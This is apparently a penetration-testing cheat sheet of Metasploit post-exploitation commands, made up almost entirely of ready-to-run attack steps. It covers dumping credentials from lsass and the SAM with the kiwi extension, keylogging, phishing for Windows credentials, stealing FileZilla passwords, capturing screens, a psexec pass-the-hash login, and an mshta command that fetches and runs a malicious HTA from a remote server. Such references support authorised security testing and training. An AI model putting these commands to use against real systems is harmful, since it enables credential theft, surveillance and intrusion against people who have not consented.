Metasploit

Usage

Enable RDPEnable WinRMMigrate processKiwi ExtensionKeyloggerPhishing Module

use windows/manage/enable_rdp
set SESSION 1
run

sessions -i 1
powershell_execute Enable-PSRemoting -Force

PID

sessions -i 1
ps
migrate $PID

Program name

sessions -i 1
migrate -N lsass.exe 

sessions -i 1
load kiwi

creds_all
lsa_dump_sam
lsa_dump_secrets

sessions -i 1
keyscan_start
keyscan_dump    

sessions -i 1
load extapi
help

use post/windows/gather/phish_windows_credentials
set SESSION 1
set PROCESS notepad.exe
run

Screenshots && ScreenshareFilezilla Credentials StealingApplications EnumerationPsexec

sesssions -i 1
screenshot

sessions -i 1
load espia
screengrab

sessions -i 1
screenshare

use post/multi/gather/filezilla_client_cred
set SESSION 1
run

use post/windows/gather/enum_applications
set SESSION 1
run

use exploit/windows/smb/psexec  
set RHOSTS 10.10.10.10
set SMBUSER administrator
set SMBPASS 00000000000000000000000000000000:NTML_HASH  
run

From a reverse-shell to a meterpreter session

Start HTA ServerExecute malicious HTA

use exploit/windows/misc/hta_server
run

mshta.exe http://10.10.10.10/random_file_generated.hta

References

• AttackDefense